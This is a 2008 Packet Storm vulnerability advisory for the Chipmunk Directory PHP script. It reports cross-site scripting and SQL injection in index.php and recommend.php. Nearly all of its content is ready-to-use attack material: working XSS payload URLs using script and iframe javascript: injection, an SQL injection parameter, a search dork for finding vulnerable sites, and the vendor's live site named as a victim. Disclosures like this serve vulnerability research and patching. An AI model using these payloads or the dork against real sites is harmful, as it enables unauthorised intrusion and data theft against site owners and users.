chipmunkdir-sqlxss.txt

2008-11-26T00:00:00
ID PACKETSTORM:72328
Type packetstorm
Reporter Pouya Server
Modified 2008-11-26T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: Chipmunk Directory  
Vendor : http://www.chipmunk-scripts.com/page.php?ID=15  
Download : http://www.chipmunk-scripts.com/directory/directory.zip  
Vulnerable File's : index.php,recommend.php  
Dork: Powered by (c) Chipmunk Directory  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (XSS/SQL)  
---------------------------------------------------------  
#########################################################  
[XSS]:  
http://www.site.com/directory/index.php?catid=1&start=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt  
>  
http://www.site.com/directory/recommend.php?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527Pouya_Server%2527)%3E%3C/IFRAME%3E  
  
  
[SQL]:  
http://www.site.com/directory/index.php?catid=1&start=[SQL]  
---------------------------------  
  
Victem :  
http://www.chipmunk-scripts.com/directory  
`